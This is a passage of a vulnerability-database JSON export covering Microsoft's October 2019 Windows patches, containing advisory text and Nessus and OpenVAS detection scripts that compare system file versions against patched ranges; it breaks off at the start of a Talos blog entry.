context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238, CVE-2019-1239)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2019-1366)\");\n # https://support.microsoft.com/en-us/help/4519338/windows-10-update-kb4519338\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ef69aa73\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4519338.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4519338');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4519338])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T20:40:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1342", "CVE-2019-1336", "CVE-2019-1307", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1366", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1356", "CVE-2019-1322", "CVE-2019-1367", "CVE-2019-1192", "CVE-2019-1321", "CVE-2019-1371", "CVE-2019-1316", "CVE-2019-1238", "CVE-2019-1326", "CVE-2019-1337", "CVE-2019-1359", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1323", "CVE-2019-1335", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1308", "CVE-2019-1320", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317", "CVE-2019-0608", "CVE-2019-1357"], "description": "This host is missing a critical security\n update according to Microsoft KB4517389", "modified": "2020-07-17T00:00:00", "published": "2019-10-09T00:00:00", "id": "OPENVAS:1361412562310815493", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815493", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4517389)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815493\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-0608\", \"CVE-2019-1060\", \"CVE-2019-1166\", \"CVE-2019-1192\",\n \"CVE-2019-1238\", \"CVE-2019-1307\", \"CVE-2019-1308\", \"CVE-2019-1311\",\n \"CVE-2019-1315\", \"CVE-2019-1316\", \"CVE-2019-1317\", \"CVE-2019-1318\",\n \"CVE-2019-1319\", \"CVE-2019-1320\", \"CVE-2019-1321\", \"CVE-2019-1322\",\n \"CVE-2019-1323\", \"CVE-2019-1325\", \"CVE-2019-1326\", \"CVE-2019-1333\",\n \"CVE-2019-1334\", \"CVE-2019-1335\", \"CVE-2019-1336\", \"CVE-2019-1337\",\n \"CVE-2019-1339\", \"CVE-2019-1340\", \"CVE-2019-1341\", \"CVE-2019-1342\",\n \"CVE-2019-1343\", \"CVE-2019-1344\", \"CVE-2019-1345\", \"CVE-2019-1346\",\n \"CVE-2019-1347\", \"CVE-2019-1356\", \"CVE-2019-1357\", \"CVE-2019-1358\",\n \"CVE-2019-1359\", \"CVE-2019-1365\", \"CVE-2019-1366\", \"CVE-2019-1367\",\n \"CVE-2019-1368\", \"CVE-2019-1371\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-10-09 10:13:33 +0530 (Wed, 09 Oct 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4517389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4517389\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle\n attacker is able to successfully bypass the NTLM MIC (Message Integrity Check)\n protection.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - A spoofing vulnerability exists when Transport Layer Security (TLS) accesses\n non Extended Master Secret (EMS) sessions.\n\n - Microsoft Windows Update Client does not properly handle privileges.\n\n - Windows Error Reporting manager improperly handles process crashes.\n\n - Microsoft Browsers does not properly parse HTTP content.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code on the client machine, bypass security restrictions,\n elevate privileges and read privileged data across trust boundaries, create a\n denial of service condition and conduct spoofing attack.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1903 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1903 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4517389\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Schannel.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.417\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Schannel.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.417\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1342", "CVE-2019-1307", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1366", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1356", "CVE-2019-1322", "CVE-2019-1367", "CVE-2019-1192", "CVE-2019-1321", "CVE-2019-1371", "CVE-2019-1316", "CVE-2019-1238", "CVE-2019-1326", "CVE-2019-1359", "CVE-2019-1230", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1335", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1308", "CVE-2019-1320", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317", "CVE-2019-0608", "CVE-2019-1357"], "description": "This host is missing a critical security\n update according to Microsoft KB4520008", "modified": "2020-07-17T00:00:00", "published": "2019-10-09T00:00:00", "id": "OPENVAS:1361412562310815488", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815488", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4520008)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815488\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-0608\", \"CVE-2019-1060\", \"CVE-2019-1166\", \"CVE-2019-1192\",\n \"CVE-2019-1230\", \"CVE-2019-1238\", \"CVE-2019-1307\", \"CVE-2019-1308\",\n \"CVE-2019-1311\", \"CVE-2019-1315\", \"CVE-2019-1316\", \"CVE-2019-1317\",\n \"CVE-2019-1318\", \"CVE-2019-1319\", \"CVE-2019-1320\", \"CVE-2019-1321\",\n \"CVE-2019-1322\", \"CVE-2019-1325\", \"CVE-2019-1326\", \"CVE-2019-1333\",\n \"CVE-2019-1334\", \"CVE-2019-1335\", \"CVE-2019-1339\", \"CVE-2019-1340\",\n \"CVE-2019-1341\", \"CVE-2019-1342\", \"CVE-2019-1343\", \"CVE-2019-1344\",\n \"CVE-2019-1345\", \"CVE-2019-1346\", \"CVE-2019-1347\", \"CVE-2019-1356\",\n \"CVE-2019-1357\", \"CVE-2019-1358\", \"CVE-2019-1359\", \"CVE-2019-1365\",\n \"CVE-2019-1366\", \"CVE-2019-1367\", \"CVE-2019-1368\", \"CVE-2019-1371\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-10-09 10:13:33 +0530 (Wed, 09 Oct 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4520008)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4520008\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft Browsers does not properly parse HTTP content.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle\n attacker is able to successfully bypass the NTLM MIC (Message Integrity Check)\n protection.\n\n - Chakra scripting engine handles objects in memory in Microsoft Edge.\n\n - Windows improperly handles hard link.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Microsoft browsers improperly handle requests of different origins.\n\n - Windows improperly handles authentication requests..\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code on the client machine, bypass security restrictions,\n elevate privileges and read privileged data across trust boundaries, create a\n denial of service condition and conduct spoofing attack.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for x64-based Systems\n\n - Microsoft Windows 10 Version 1803 for 32-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4520008\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nexeVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!exeVer)\n exit(0);\n\nif(version_in_range(version:exeVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1066\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:exeVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1066\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1342", "CVE-2019-1336", "CVE-2019-1307", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1366", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1356", "CVE-2019-1322", "CVE-2019-1367", "CVE-2019-1192", "CVE-2019-1321", "CVE-2019-1371", "CVE-2019-1238", "CVE-2019-1326", "CVE-2019-1337", "CVE-2019-1359", "CVE-2019-1230", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1323", "CVE-2019-1335", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1308", "CVE-2019-1320", "CVE-2019-1239", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317", "CVE-2019-0608", "CVE-2019-1357"], "description": "This host is missing a critical security\n update according to Microsoft KB4519338", "modified": "2020-07-17T00:00:00", "published": "2019-10-10T00:00:00", "id": "OPENVAS:1361412562310815497", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815497", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4519338)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815497\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-0608\", \"CVE-2019-1060\", \"CVE-2019-1166\", \"CVE-2019-1192\",\n \"CVE-2019-1230\", \"CVE-2019-1238\", \"CVE-2019-1239\", \"CVE-2019-1307\",\n \"CVE-2019-1308\", \"CVE-2019-1311\", \"CVE-2019-1315\", \"CVE-2019-1317\",\n \"CVE-2019-1318\", \"CVE-2019-1319\", \"CVE-2019-1320\", \"CVE-2019-1321\",\n \"CVE-2019-1322\", \"CVE-2019-1323\", \"CVE-2019-1325\", \"CVE-2019-1326\",\n \"CVE-2019-1333\", \"CVE-2019-1334\", \"CVE-2019-1335\", \"CVE-2019-1336\",\n \"CVE-2019-1337\", \"CVE-2019-1339\", \"CVE-2019-1340\", \"CVE-2019-1341\",\n \"CVE-2019-1342\", \"CVE-2019-1343\", \"CVE-2019-1344\", \"CVE-2019-1345\",\n \"CVE-2019-1346\", \"CVE-2019-1347\", \"CVE-2019-1356\", \"CVE-2019-1357\",\n \"CVE-2019-1358\", \"CVE-2019-1359\", \"CVE-2019-1365\", \"CVE-2019-1366\",\n \"CVE-2019-1367\", \"CVE-2019-1368\", \"CVE-2019-1371\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-10-10 14:23:24 +0530 (Thu, 10 Oct 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4519338)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4519338\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft Browsers does not properly parse HTTP content.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows Hyper-V Network Switch on a host operating system fails to properly\n validate input from an authenticated user on a guest operating system.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows Error Reporting (WER) improperly handles and executes files.\n\n - Microsoft Windows Update Client does not properly handle privileges.\n\n - Windows Error Reporting manager improperly handles hard links.\n\n - Microsoft browsers improperly handle requests of different origins.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, obtain information to further compromise\n a user's system, elevate permissions and create a denial of service condition\n causing the target system to become unresponsive.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for x64-based Systems\n\n - Microsoft Windows Server 2019\n\n - Microsoft Windows 10 Version 1809 for 32-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/help/4519338\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17763.0\", test_version2:\"10.0.17763.801\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.17763.0 - 10.0.17763.801\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-10-17T09:31:12", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0608", "CVE-2019-0712", "CVE-2019-1060", "CVE-2019-1070", "CVE-2019-1166", "CVE-2019-1230", "CVE-2019-1238", "CVE-2019-1239", "CVE-2019-1307", "CVE-2019-1308", "CVE-2019-1311", "CVE-2019-1313", "CVE-2019-1314", "CVE-2019-1315", "CVE-2019-1316", "CVE-2019-1317", "CVE-2019-1318", "CVE-2019-1319", "CVE-2019-1320", "CVE-2019-1321", "CVE-2019-1322", "CVE-2019-1323", "CVE-2019-1325", "CVE-2019-1326", "CVE-2019-1327", "CVE-2019-1328", "CVE-2019-1329", "CVE-2019-1330", "CVE-2019-1331", "CVE-2019-1333", "CVE-2019-1334", "CVE-2019-1335", "CVE-2019-1336", "CVE-2019-1337", "CVE-2019-1338", "CVE-2019-1339", "CVE-2019-1340", "CVE-2019-1341", "CVE-2019-1342", "CVE-2019-1343", "CVE-2019-1344", "CVE-2019-1345", "CVE-2019-1346", "CVE-2019-1347", "CVE-2019-1356", "CVE-2019-1357", "CVE-2019-1358", "CVE-2019-1359", "CVE-2019-1361", "CVE-2019-1362", "CVE-2019-1363", "CVE-2019-1364", "CVE-2019-1365", "CVE-2019-1366", "CVE-2019-1368", "CVE-2019-1369", "CVE-2019-1371", "CVE-2019-1372", "CVE-2019-1375", "CVE-2019-1376", "CVE-2019-1378"], "description": 